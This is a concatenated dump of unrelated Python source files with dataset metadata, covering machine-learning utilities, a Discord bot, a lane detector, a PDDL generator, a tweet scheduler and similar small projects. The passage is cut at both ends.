who.right(2)\n\ndraw_square(set_brad())\n\nwindow.exitonclick()\n","sub_path":"project03/art_flower.py","file_name":"art_flower.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"332244040","text":"\"\"\"\nMethods for sc-ML project \n\nReferenced to Pinkwink & sklearn-github\n\nhttps://pinkwink.kr/\nhttps://github.com/scikit-learn/scikit-learn\n\n\nUsecase\n-------\nimport utils as ut\n\n\nut.split_train_test(socar_rd_cp)\n\n\"\"\"\n# Authors : dockyum \n# EbraLim \n# ryuseunghwan1 \n\n#!pip install imblearn\n\n\nimport time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# model selection\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score, roc_auc_score, confusion_matrix\nfrom sklearn.metrics import roc_curve\n\n# sampler\nfrom imblearn.over_sampling import SMOTE, SMOTENC, SMOTEN, ADASYN, BorderlineSMOTE, KMeansSMOTE, SVMSMOTE\nfrom imblearn.over_sampling import RandomOverSampler\n\n# pipeline\nfrom sklearn.base import BaseEstimator\nfrom sklearn.pipeline import Pipeline\n\n# scaler\nfrom sklearn.preprocessing import RobustScaler, StandardScaler, MinMaxScaler\n\n# models\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom lightgbm import LGBMClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.svm import SVC\n\n# CV\nfrom sklearn.model_selection import KFold, GridSearchCV, StratifiedKFold\n\n\n# Sampler\n\nsamplers = [('SMOTE', SMOTE(random_state=13)),\n ('ADASYN', ADASYN(random_state=13)), \n ('BorderlineSMOTE', BorderlineSMOTE(random_state=13)), \n ('KMeansSMOTE', KMeansSMOTE(random_state=13)), \n ('SVMSMOTE', SVMSMOTE(random_state=13)), \n ('RandomOverSampler', RandomOverSampler(random_state=13))]\n\n# Scaler\nscalers = [('No', None ),\n ('RB', RobustScaler()),\n ('SD', StandardScaler()),\n ('MM', MinMaxScaler()),]\n\n# Estimator\nclfs = [('LogisticReg', LogisticRegression(random_state=13, max_iter=1000)),\n ('DecisionTree', DecisionTreeClassifier(random_state=13)),\n ('RandomForest', RandomForestClassifier(random_state=13)),\n ('LightGBM', LGBMClassifier(random_state=13)),\n ('SVC', SVC(random_state=13))]\n\nclf_names = [clf[0] for clf in clfs]\n \n \n# parameters\n\nlr_params = [{'clf__penalty': ['l2'], \n 'clf__class_weight' : [{0: 0.01, 1: 1.0}, {0: 0.005, 1: 1},'balanced']}] \ndt_params = [{'clf__max_depth' : [3, 4, 6, 8, 10, 30], \n 'clf__max_features': [None,'sqrt','log2'], \n 'clf__class_weight' : [{0: 0.01, 1: 1.0}, {0: 0.005, 1: 1},'balanced']}]\nrf_params = [{'clf__n_estimators': [50, 100, 200, 400], \n 'clf__max_depth' : [4, 6, 8, 10, 30],\n 'clf__class_weight' : [{0: 0.01, 1: 1.0}, {0: 0.005, 1: 1},'balanced']}]\nlgbm_params = [{'clf__n_estimators' : [50, 100, 200, 400], \n 'clf__num_leaves': [4, 8, 16],\n 'clf__class_weight' : [{0: 0.01, 1: 1.0}, {0: 0.005, 1: 1},'balanced']}]\nsvc_params = [{'clf__kernel': ['rbf'], \n 'clf__class_weight' : ['balanced'],\n 'clf__C' : [0.1, 1.0]}]\n\n \n# X_Train, X_Test, y_train, y_test 데이터 분리\ndef split_train_test(df):\n \"\"\"\n Split sc dataset into train and test subsets easily.\n \n \n Parameters\n ---------- \n df : DataFrame\n \n \n return\n ---------- \n X_train, X_test, y_train, y_test\n \n .\n\n \"\"\"\n train_set = df[df['c_25'] == 0]\n test_set = df[df['c_25'] == 1]\n\n X_train = train_set.drop(['c_25','c_1'], axis=1)\n y_train = train_set['c_1']\n\n X_test = test_set.drop(['c_25', 'c_1'], axis=1)\n y_test = test_set['c_1']\n \n print('==Split Result==')\n print('y_train : ', list(map(lambda x: x.tolist(), np.unique(y_train, return_counts=True))))\n print('y_test :', list(map(lambda x: x.tolist(), np.unique(y_test, return_counts=True))) )\n\n return X_train, X_test, y_train, y_test\n\n\n# 선택한 Sampler 적용하여 데이터 샘플링\ndef fit_sampler(X_train, \n y_train, \n sampler='SMOTE'):\n \"\"\"\n Sampler selector and fit_resample\n \n\n Parameters\n ----------\n X_train : \n Train data of features\n \n y_train : \n Train data of labels\n \n sampler : (string), default='SMOTE'\n 'ADASYN', 'BorderlineSMOTE', 'KMeansSMOTE', 'SVMSMOTE', 'RandomOverSampler'\n\n Return\n ---------- \n X_train_over, y_train_over\n \n .\n \n \"\"\"\n sampler_selected = [one[1] for one in samplers if one[0] == sampler][0]\n\n X_train_over, y_train_over = sampler_selected.fit_resample(X_train, y_train)\n\n print('==Sampling Result==')\n print('y_train : ', list(map(lambda x: x.tolist(), np.unique(y_train, return_counts=True))))\n print('y_train_over :', list(map(lambda x: x.tolist(), np.unique(y_train_over, return_counts=True))))\n\n return X_train_over, y_train_over\n\n\n# Done\ndef clf_evaluation(y_test, \n y_pred,\n acc_s=True,\n pre_s=True,\n rec_s=True,\n f1_s=True,\n auc_s=True,\n conf_m=True,\n view_scores=True):\n \"\"\"\n Get all evaluation scores from 'y_test', 'y_pred'.\n\n Parameters\n ----------\n y_test : \n Truth labels\n \n y_pred : \n Predicted labels\n \n acc_s, pre_s, rec_s, f1_s, auc_s, conf_m : (bool), default=True\n On-off each scores\n \n \"\"\"\n if acc_s :\n acc = accuracy_score(y_test, y_pred)\n else:\n acc = None\n if pre_s :\n pre = precision_score(y_test, y_pred)\n else:\n pre = None\n if rec_s :\n rec = recall_score(y_test, y_pred)\n else:\n rec = None\n if f1_s :\n f1 = f1_score(y_test, y_pred)\n else:\n f1 = None\n if auc_s :\n auc = roc_auc_score(y_test, y_pred)\n else:\n auc = None\n if conf_m :\n confusion = confusion_matrix(y_test, y_pred)\n print('=> confusion matrix')\n print(confusion)\n print('======================')\n \n if view_scores :\n col_names = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n result = [[acc, pre, rec, f1, auc]]\n df_values = pd.DataFrame(result, columns=col_names)\n print(df_values)\n print('====Done Evaluation====')\n \n return acc, pre, rec, f1, auc\n\n\n# fit_cv\ndef fit_cv(X_train, y_train, X_test, y_test, scaler='RB', scoring='recall', conf_m=False, view_scores=False, draw_cv=True, n_jobs=-1, **kwargs):\n \"\"\"\n GridSearchCV. \n \n \n \n Parameters\n ----------\n\n scoring : (string), default='recall'\n 'recall', 'precision', 'f1'\n \n scaler : (string), default='RB'\n 'No': None, 'SD' : StandardScaler(), 'MM' : MinmaxScaler(), 'RB' : RobustScaler()\n \n conf_m : (bool), default=True\n on-off confusion matrix\n \n view_scores : (bool), default=True\n on-off each scores\n \n Return\n ----------\n \n cv_list : list of best estimators resulted from cross-validations.\n result_df : dataframe of cross-validation results.\n \n \n \"\"\"\n cv_list = []\n cv_estimators = []\n st_time = time.time()\n \n scaler_selected = [one[1] for one in scalers if one[0] == scaler][0]\n \n # Pipelines\n lr_pipe = Pipeline([(\"scaler\", scaler_selected), (\"clf\", clfs[0][1])], verbose=True)\n dt_pipe = Pipeline([(\"scaler\", scaler_selected), (\"clf\", clfs[1][1])], verbose=True)\n rf_pipe = Pipeline([(\"scaler\", scaler_selected), (\"clf\", clfs[2][1])], verbose=True)\n lgbm_pipe = Pipeline([(\"scaler\", scaler_selected), (\"clf\", clfs[3][1])], verbose=True)\n svm_pipe = Pipeline([(\"scaler\", scaler_selected), (\"clf\", clfs[4][1])], verbose=True)\n \n skfold = StratifiedKFold(n_splits=5, random_state=13, shuffle=True)\n \n lr_CV = GridSearchCV(lr_pipe, lr_params, cv=skfold, scoring=scoring, n_jobs=n_jobs)\n dt_CV = GridSearchCV(dt_pipe, dt_params, cv=skfold, scoring=scoring, n_jobs=n_jobs)\n rf_CV = GridSearchCV(rf_pipe, rf_params, cv=skfold, scoring=scoring, n_jobs=n_jobs)\n lgbm_CV = GridSearchCV(lgbm_pipe, lgbm_params, cv=skfold, scoring=scoring, n_jobs=n_jobs)\n svc_CV = GridSearchCV(svm_pipe, svc_params, cv=skfold, scoring=scoring, n_jobs=n_jobs)\n\n CVs = [lr_CV, dt_CV, rf_CV, lgbm_CV, svc_CV]\n\n result_df = pd.DataFrame(columns=['classifier', 'train accuracy', 'train precision', 'train recall', 'train f1','train auc','test accuracy','test precision','test recall','test f1','test auc'])\n\n for idx, cv in enumerate(CVs):\n cv.fit(X_train, y_train)\n \n cv_list.append(cv.best_estimator_)\n cv_estimators.append([cv.best_estimator_[0], cv.best_estimator_[1]])\n\n y_pred_train = cv.predict(X_train)\n y_pred_test = cv.predict(X_test)\n\n acc_tr, pre_tr, rec_tr, f1_tr, auc_tr = clf_evaluation(y_train, y_pred_train, conf_m=conf_m, view_scores=view_scores, **kwargs)\n acc_te, pre_te, rec_te, f1_te, auc_te = clf_evaluation(y_test, y_pred_test, conf_m=conf_m, view_scores=view_scores, **kwargs)\n\n result = {'classifier' : clfs[idx][0],\n 'train accuracy' : acc_tr,\n 'train precision' : pre_tr,\n 'train recall' : rec_tr,\n 'train f1': f1_tr,\n 'train auc' : auc_tr,\n 'test accuracy' : acc_te,\n 'test precision' : pre_te,\n 'test recall' : rec_te,\n 'test f1' : f1_te,\n 'test auc' : auc_te }\n\n result_df = result_df.append(result, ignore_index=True)\n \n \n # 히트맵\n conf_mtx = confusion_matrix(y_test, y_pred_test)\n plt.figure(figsize=(6,4))\n plt.title(f\"< {clfs[idx][0]} >\")\n sns.heatmap(conf_mtx, annot=True, yticklabels=[\"No_act\", \"Yes_act\"], xticklabels=[\"No_pred\", \"Yes_pred\"], fmt='d')\n plt.show()\n \n print('Fit time :', round((time.time() - st_time) / 60, 2), 'min')\n \n if draw_cv:\n draw_roc_curve(cv_list, cv_estimators, X_test, y_test)\n \n result_df\n return cv_list, result_df\n \n\n# roc_curve 그래프 만들기\ndef draw_roc_curve(models, model_names, X_test, y_test):\n plt.figure(figsize=(10,10))\n \n for idx in range(len(models)-1):\n pred = models[idx].predict_proba(X_test)[:, 1]\n fpr, tpr, thresholds = roc_curve(y_test, pred)\n plt.plot(fpr, tpr, label=model_names[idx])\n \n plt.plot([0,1], [0,1], 'k--', label='random quess')\n plt.title('ROC')\n plt.legend()\n plt.grid()\n plt.show()","sub_path":"workspace/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"259243431","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2015 - hackfox \n# Created on 2015/07/06\n\"\"\"\n# 1,2,3,4 组成互不相同的三位数是多少个,各是谁\n\"\"\"\n\n# 1,2,3,4 组成互不相同的三位数是多少个,各是谁\n# range()函数,左边为最小值,右边是小于该值\n# python 没有switch case语句\n# python 没有&& ||运算符,代之的是and和or\n# python 没有++ -- 操作法,代之的是+=1 -=1\n# python for循环不加()\n# python 函数定义用def 都有返回值,不用写出\ncn = 0\nfor i in range(1, 5):\n for j in range(1, 5):\n for k in range(1, 5):\n if i != j and j != k and i != k:\n print(i * 100 + j * 10 + k)\n cn += 1\n\nprint('count->' + str(cn))\n","sub_path":"Python/201507/some.py","file_name":"some.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"191603330","text":"#!/usr/bin/env python\nimport configparser\n\nfrom setuptools import find_packages, setup\n\nSRC_PREFIX = 'src'\n\npackages = find_packages(SRC_PREFIX)\n\n\ndef get_required_packages():\n \"\"\"\n Returns the packages used for install_requires\n\n This used to pin down every package in Pipfile.lock to the version, but that, in turn, broke\n downstream projects because it was way too strict.\n\n Now, this simply grabs all the items listed in the `Pipfile` `[packages]` section without version\n pinning\n \"\"\"\n config = configparser.ConfigParser(strict=False)\n config.read('Pipfile')\n\n install_requires = sorted([x for x in config['packages']])\n\n return install_requires\n\n\ndef readme():\n with open('README.md') as f:\n return f.read()\n\n\nif __name__ == '__main__':\n setup(\n name='vault-tools',\n url='https://github.com/openslate/vault-tools',\n author='OpenSlate',\n author_email='code@openslate.com',\n version='0.1.1',\n description='misc tools to work with vault',\n long_description=readme(),\n long_description_content_type='text/markdown',\n package_dir={'': 'src'},\n packages=packages,\n entry_points={\n 'console_scripts': [\n 'process-vault-environment = vault_tools.entrypoints:process_vault_environment',\n 'renew-token = vault_tools.entrypoints:renew_token',\n ],\n },\n scripts=[\n 'scripts/write-vault-environment',\n ],\n install_requires=get_required_packages()\n )\n","sub_path":"pypi_install_script/vault-tools-0.1.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"650348352","text":"from django.urls import path\nfrom . import views\n\n\napp_name = 'customer'\n\nurlpatterns = [\n path('signup/', views.SignUp.as_view(), name='signup'),\n\t#/customer/reservation/ \n\tpath('/reservation/', views.CarReservation.as_view(), name='CarReservation'),\n\t#/customer/342/invoicepayment/\n\tpath('/invoicepayment/', views.RentalInvoiceDetailView.as_view(), name='invoicepayment'),\n\t\n]\n","sub_path":"MadhuKarz/customer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"294863388","text":"import os\nimport csv\nimport discord\nfrom discord.ext import commands\nfrom discord.errors import HTTPException\nfrom modules.misc_utils import get_dict_keys, project_path\nfrom modules.chat_utils import get_embed, first_upper, bold, strikethrough\nfrom modules.data_getter import fetch, get_tables, get_character_info, get_user_character, get_columns, get_prefix\n\nparameters = {\n \"char\": [\"character\"],\n \"list\": [\"table\"]\n}\nspecial_columns = ('taken_by', 'thumbnail', 'img', 'discord_role', 'table')\n\n\nclass Output:\n def __init__(self, client):\n self.client = client\n\n @commands.command(pass_context=True)\n async def char(self, ctx, *args):\n character = ' '.join(args)\n server = ctx.message.server.id\n\n info = await get_character_info(server, character)\n attributes = get_dict_keys(info)\n\n if len(args) == 0:\n prefix = await get_prefix(server)\n await self.client.say(f\"Usage: `{prefix}char (character)`\\n\"\n f\"Use `{prefix}list` to see who's available\")\n\n if \"table\" not in attributes:\n return\n\n output = ''\n for a in attributes:\n if a not in special_columns and info[a] != \"N/A\":\n row = bold(f\"{first_upper(a).replace('_', ' ')}: \") + first_upper(info[a])\n output += row + '\\n'\n\n e = get_embed(f\"{first_upper(info['table'])} - {info['name']}\", output, discord.Colour(0x546e7a))\n e.add_field(name='Taken By:', value=info['taken_by'])\n if 'thumbnail' in attributes:\n e.set_thumbnail(url=info['thumbnail'])\n if 'img' in attributes:\n e.set_image(url=info['img'])\n if 'discord_role' in attributes:\n role = discord.utils.get(ctx.message.server.roles, name=info['discord_role'])\n if role is not None:\n e.colour = role.colour\n\n prefix = await get_prefix(server)\n try:\n await self.client.say(f\"Like this character? Use `{prefix}take {info['name']}` to become them!\", embed=e)\n except HTTPException:\n e.set_thumbnail(url='')\n e.set_image(url='')\n await self.client.say(f\"Like this character? Use `{prefix}take {info['name']}` to become them!\", embed=e)\n\n @commands.command(pass_context=True, aliases=[\"list\"])\n async def catalogue(self, ctx, *args):\n msgs = {\n \"usage\": \"Usage: `{}list (table)`\",\n \"invalid_param\": \"Error: Table `{}` doesn't exist\",\n \"tables\": \"Available tables: `{}`\",\n \"success\": \"Use `{}take (name)` to become one of these characters!\\n\"\n \"Use `{}char (name)` to see a character's info!\"\n }\n\n pl = parameters[\"list\"]\n server = ctx.message.server.id\n tables = await get_tables(server)\n prefix = await get_prefix(server)\n\n if pl.index(\"table\") >= len(args):\n await self.client.say(msgs['usage'].format(prefix) + '\\n' +\n msgs[\"tables\"].format(\"` `\".join(tables)))\n return\n\n t = args[pl.index(\"table\")].lower()\n if t not in tables:\n await self.client.say(msgs['invalid_param'].format(args[pl.index(\"table\")]) + '\\n' +\n msgs[\"tables\"].format(\"` `\".join(tables)))\n return\n\n characters = await fetch(server, t, \"name\")\n characters = [c[\"name\"] for c in characters]\n\n output = ''\n for c in characters:\n formatted_c = bold(c)\n taken_by = (await fetch(server, t, \"taken_by\", f\"name='{c}'\"))[0][\"taken_by\"]\n if taken_by != \"nobody\":\n formatted_c = strikethrough(formatted_c)\n output += f\"{formatted_c}\\n\"\n\n await self.client.say(msgs[\"success\"].format(prefix, prefix),\n embed=get_embed(first_upper(t), output, discord.Colour(0x546e7a)))\n\n @commands.command(pass_context=True, aliases=[\"export\"])\n async def download(self, ctx, example=None):\n if not ctx.message.author.server_permissions.administrator:\n await self.client.say(\"You don't have the permissions to do that!\")\n return\n\n if example == \"example\":\n fout = os.path.join(project_path, \"files\", \"example.csv\")\n await self.client.send_file(ctx.message.channel, fout)\n return\n\n server = ctx.message.server.id\n tables = await get_tables(server)\n columns = await get_columns(server)\n\n path = os.path.join(project_path, \"files\", f\"{server}.csv\")\n with open(path, \"w+\") as fout:\n writer = csv.writer(fout)\n\n for t in tables:\n row = [t]\n row += [' ' for i in range(len(columns)-1)]\n writer.writerow(row)\n writer.writerow(columns)\n\n data = await fetch(server, t, \"all\")\n for d in data:\n row = []\n for c in columns:\n row.append(d[c])\n\n writer.writerow(row)\n\n await self.client.send_file(ctx.message.channel, path, filename=\"Server Data.csv\")\n\n os.remove(path)\n\n\ndef setup(client):\n client.add_cog(Output(client))","sub_path":"commands/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":5285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"142213847","text":"import korflib\nimport sys\n\n#Make sure command line has 2 arguments\nassert(len(sys.argv) == 2)\n\n#Make the length of each sequence line 60 bases long\ndef wrap(seq, step=60):\n\tfor i in range(0, len(seq), step):\n\t\tprint(seq[i:i+step])\n\t\t\n#Read in fasta file and change specific sequences into Ns\nfor id, seq in korflib.read_fasta(sys.argv[1]):\n\tif id.startswith(\"X\"):\n\t\tbeg = 74036400\n\t\tend = 74085786\t\t#exon beg is 74085691 \n\t\tmut = 74085586\t\t#the T at this site was changed to A\n\t\tmx = seq[:beg] + \"N\"*(end-beg) + seq[end:]\n\t\tprint(f\">{id}\")\n\t\twrap(mx)\n\t\tprint(\">Mecp2_e1 dna:chromosome chromosome:GRCm38:Mecp2_e1:1:49386:1 REF\")\n\t\twrap(seq[beg:end])\n\t\tprint(\">Mecp2_e2 dna:chromosome chromosome:GRCm38:Mecp2_e2:1:49386:1 REF\")\n\t\twrap(seq[beg:mut-1] + \"a\" + seq[mut:end])\n\telse:\n\t\tprint(f\">{id}\")\n\t\twrap(seq)\n\t","sub_path":"custom_refgenome.py","file_name":"custom_refgenome.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"78346351","text":"\"\"\"\nSample\n(define (problem BW-rand-50)\n(:domain blocksworld)\n(:objects b1 b2 b3 - block)\n(:init\n(handempty)\n(ontable b1)\n(on b3 b2)\n(ontable b2)\n(clear b1)\n(clear b3)\n)\n(:goal\n(and\n(on b1 b2)\n(on b2 b3)\n)\n)\n)\n\"\"\"\nimport random\nimport copy\n#================================================\ndef generate_problem(num_blocks, dest_file_name, num_blocks_in_goal = None):\n \"\"\"\n\n :param num_blocks:\n :param num_blocks_in_goal:\n :return:\n \"\"\"\n if num_blocks_in_goal == None:\n num_blocks_in_goal = num_blocks\n block_obj_list = [\"b\"+str(x) for x in range(num_blocks)]\n goal_blocks_list = random.sample(block_obj_list,num_blocks_in_goal)\n clear_blocks = copy.deepcopy(block_obj_list)\n with open(dest_file_name,\"w\") as dest_file:\n dest_file.write(\"(define (problem BW-rand-\" + str(num_blocks)+\")\\n\")\n dest_file.write(\"(:domain blocksworld)\\n\")\n dest_file.write(\"(:objects \" + \" \".join(block_obj_list) + \" - block)\\n\")\n dest_file.write(\"(:init \\n\")\n dest_file.write(\"\")\n dest_file.write(\"(handempty)\\n\")\n for block in block_obj_list:\n #either choose a clear block to stack on, or be on table\n available_choices = clear_blocks + [\"ontable\"]\n pos = random.choice(available_choices)\n if pos == 'ontable':\n dest_file.write(\"(ontable \"+block+\")\\n\")\n else:#it will be placed on a block\n dest_file.write(\"(on \"+block +' '+pos+\")\\n\")\n clear_blocks.remove(pos)\n #end for loop\n dest_file.write(\")\\n\")\n #now write the goals\n dest_file.write(\"(:goal\\n\")\n dest_file.write(\"(and\\n\")\n clear_blocks = copy.deepcopy(goal_blocks_list)\n for block in goal_blocks_list:\n #either choose a clear block to stack on, or be on table\n available_choices = clear_blocks+ [\"ontable\"]\n pos = random.choice(available_choices)\n if pos == 'ontable':\n dest_file.write(\"(ontable \"+block+\")\\n\")\n else:#it will be placed on a block\n dest_file.write(\"(on \"+block +' '+pos+\")\\n\")\n clear_blocks.remove(pos)\n #end for loop through goal blocks\n dest_file.write(\")\\n)\\n)\")\n #end with statement\n\nif __name__ == \"__main__\":\n random.seed(4)\n generate_problem(5,\"test_blocks_prob.pddl\",3)","sub_path":"Blocksworld_problem_gen.py","file_name":"Blocksworld_problem_gen.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"497864159","text":"\n\n#calss header\nclass _GIRLFRIEND():\n\tdef __init__(self,): \n\t\tself.name = \"GIRLFRIEND\"\n\t\tself.definitions = [u'a woman or girl who a person is having a romantic or sexual relationship with: ', u'the female friend of a woman: ', u'used, usually by a woman, when talking to a woman: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_girlfriend.py","file_name":"_girlfriend.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"444716071","text":"import math\nimport cv2\nfrom utils import *\n\nclass LaneDetector(object):\n\n def __init__(self):\n pass\n\n # canny transform\n def canny(self, img, low_threshold, high_threshold):\n return cv2.Canny(img, low_threshold, high_threshold) \n\n def gaussian_blur(self, img, kernel_size):\n return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)\n\n # Find region of interest for the lanes based on defined polygon\n def region_of_interest(self, img, vertices):\n # defining a blank mask to start with\n mask = np.zeros_like(img) \n \n # defining a 3 channel or 1 channel color to fill the mask with depending on the input image\n if len(img.shape) > 2:\n channel_count = img.shape[2] # i.e. 3 or 4 depending on your image\n ignore_mask_color = (255,) * channel_count\n else:\n ignore_mask_color = 255\n \n # filling pixels inside the polygon defined by \"vertices\" with the fill color \n cv2.fillPoly(mask, vertices, ignore_mask_color)\n \n # returning the image only where mask pixels are nonzero\n masked_image = cv2.bitwise_and(img, mask)\n return masked_image\n\n \n def draw_lines(self, img, lines, color=[255, 0, 0], thickness=5):\n ll_slope_sum, ll_cnt, rl_slope_sum, rl_cnt = 0, 0, 0, 0\n ll_max, rl_max = (img.shape[1], img.shape[0]), (img.shape[1], img.shape[0])\n\n # Limit left lane lines with slopes between 20 and 70 degrees and right lane\n # slopes between 100 and 160 degrees.\n for line in lines:\n for x1, y1, x2, y2 in line:\n slope = Utils.get_slope(x1, y1, x2, y2)\n if 100 < math.degrees(slope) < 160:\n rl_cnt += 1\n rl_slope_sum += slope\n rl_max = (x1, y1) if y1 < rl_max[1] else rl_max\n elif 20 < math.degrees(slope) < 70:\n ll_cnt += 1\n ll_slope_sum += slope\n ll_max = (x2, y2) if y2 < ll_max[1] else ll_max\n\n # Draw left and right lanes based on top most value and average slope\n top_bound = int(img.shape[0] * .62)\n if ll_cnt > 0:\n (llx2, lly2) = ll_max\n (llx1, lly1) = (int(llx2 - (img.shape[0]-lly2)/math.tan(float(ll_slope_sum)/ll_cnt)), img.shape[0])\n assert (0 < Utils.get_slope(llx1, lly1, llx2, lly2) < math.pi/2)\n if lly2 > top_bound:\n llx2, lly2 = int(llx2 + (lly2-top_bound)/math.tan(float(ll_slope_sum)/ll_cnt)), top_bound\n elif lly2 < top_bound:\n llx2, lly2 = int(llx2 - (top_bound-lly2)/math.tan(float(ll_slope_sum)/ll_cnt)), top_bound\n cv2.line(img, (llx1, lly1), (llx2, lly2), color, thickness)\n if rl_cnt > 0:\n (rlx1, rly1) = rl_max\n (rlx2, rly2) = (int(rlx1 + (rly1-img.shape[0])/math.tan(float(rl_slope_sum)/rl_cnt)), img.shape[0])\n assert (math.pi/2 < Utils.get_slope(rlx1, rly1, rlx2, rly2) < math.pi)\n if rly1 > top_bound:\n rlx1, rly1 = int(rlx1 - (rly1-top_bound)/abs(math.tan(float(rl_slope_sum)/rl_cnt))), top_bound\n elif rly1 < top_bound:\n rlx1, rly1 = int(rlx1 + (top_bound-rly1)/abs(math.tan(float(rl_slope_sum)/rl_cnt))), top_bound\n cv2.line(img, (rlx1, rly1), (rlx2, rly2), color, thickness)\n\n # Input is a canny transformed image. Generates the hough lines\n def hough_lines(self, img, rho, theta, threshold, min_line_len, max_line_gap):\n lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)\n line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)\n if lines is not None:\n self.draw_lines(line_img, lines)\n return line_img\n\n # final image is a weighted combination of the original image and image with hough lines \n def weighted_img(self, img, initial_img, α=0.8, β=1., λ=0.):\n return cv2.addWeighted(initial_img, α, img, β, λ)\n\n def mark_lane(self, image):\n imshape = image.shape\n gray_img = Utils.gray_scale(image)\n gaussian_blur_img = self.gaussian_blur(gray_img, 5)\n edges = self.canny(gaussian_blur_img, 60, 200)\n vertices = np.array([[(50, imshape[0]), (imshape[1]*.4, imshape[0]*.6), (imshape[1]*.6, imshape[0]*.6), (imshape[1], imshape[0])]],dtype=np.int32)\n roi = self.region_of_interest(edges, vertices)\n hough_out = self.hough_lines(roi, 1, np.pi / 180, 50, 180, 149)\n lane_marked = self.weighted_img(hough_out, image)\n return lane_marked\n\ndef run_test_images():\n ld = LaneDetector() \n\n img = Utils.load_image('../data/solidWhiteRight.jpg')\n cv2.imwrite('../output/solidWhiteRight.jpg', cv2.cvtColor(ld.mark_lane(img), cv2.COLOR_RGB2BGR))\n img = Utils.load_image('../data/solidYellowCurve.jpg')\n cv2.imwrite('../output/solidYellowCurve.jpg', cv2.cvtColor(ld.mark_lane(img), cv2.COLOR_RGB2BGR))\n img = Utils.load_image('../data/solidYellowCurve2.jpg')\n cv2.imwrite('../output/solidYellowCurve2.jpg', cv2.cvtColor(ld.mark_lane(img), cv2.COLOR_RGB2BGR))\n img = Utils.load_image('../data/solidYellowLeft.jpg')\n cv2.imwrite('../output/solidYellowLeft.jpg', cv2.cvtColor(ld.mark_lane(img), cv2.COLOR_RGB2BGR))\n img = Utils.load_image('../data/whiteCarLaneSwitch.jpg')\n cv2.imwrite('../output/whiteCarLaneSwitch.jpg', cv2.cvtColor(ld.mark_lane(img), cv2.COLOR_RGB2BGR))\n img = Utils.load_image('../data/line-segments-example.jpg')\n cv2.imwrite('../output/line-segments-example.jpg', cv2.cvtColor(ld.mark_lane(img), cv2.COLOR_RGB2BGR))\n img = Utils.load_image('../data/laneLines_thirdPass.jpg')\n cv2.imwrite('../output/laneLines_thirdPass.jpg', cv2.cvtColor(ld.mark_lane(img), cv2.COLOR_RGB2BGR))\n\ndef run_test_video():\n ld = LaneDetector()\n import os\n from moviepy.editor import VideoFileClip\n clip = VideoFileClip(\"../data/solidYellowLeft.mp4\")\n output_clip = clip.fl_image(ld.mark_lane)\n output_clip.write_videofile(\"../output/solidYellowLeft_out.mp4\", audio=False)\n \nif '__main__' == __name__:\n #run_test_images() \n run_test_video()\n","sub_path":"finding_lanelines/src/lane_detection.py","file_name":"lane_detection.py","file_ext":"py","file_size_in_byte":6232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"629400013","text":"import time\n\nimport schedule\n\nfrom config import create_api, add_logging, LOGGER\n\n\n@add_logging(before='Waiting until next run...')\ndef tweet_pi_time(api):\n \"\"\"Tweet the pi time.\"\"\"\n try:\n api.update_status('It’s pi time!')\n except Exception:\n LOGGER.error('Error on updating status', exc_info=True)\n\n\nif __name__ == '__main__':\n api = create_api()\n schedule.every().wednesday.at('03:14').do(tweet_pi_time, api=api)\n while True:\n schedule.run_pending()\n time.sleep(1)\n","sub_path":"bots/tweet_pi_time.py","file_name":"tweet_pi_time.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"199746905","text":"#coding: utf-8\n\nimport subprocess, sys, os\nimport threading, time, datetime\nimport logging, argparse\nimport shutil\nfrom inter.apkcookpy.lib.apk import APKCook\nimport xml.etree.ElementTree as ET\n\nlogging.basicConfig(level = logging.INFO, format='%(asctime)s - %(levelname)s [%(filename)s:%(lineno)d]: %(message)s')\n\n\ndef execShellDaemon(cmd):\n '''\n async\n '''\n return subprocess.Popen(cmd, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n\ndef execShell(cmd, t=120):\n '''\n sync\n haskey('d') == success, only cmd success, should check output\n '''\n ret = {}\n try:\n p = subprocess.run(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True, timeout=t)\n \n if p.returncode == 0:\n try:\n ret['d'] = p.stdout.decode('utf-8')\n except:\n ret['d'] = 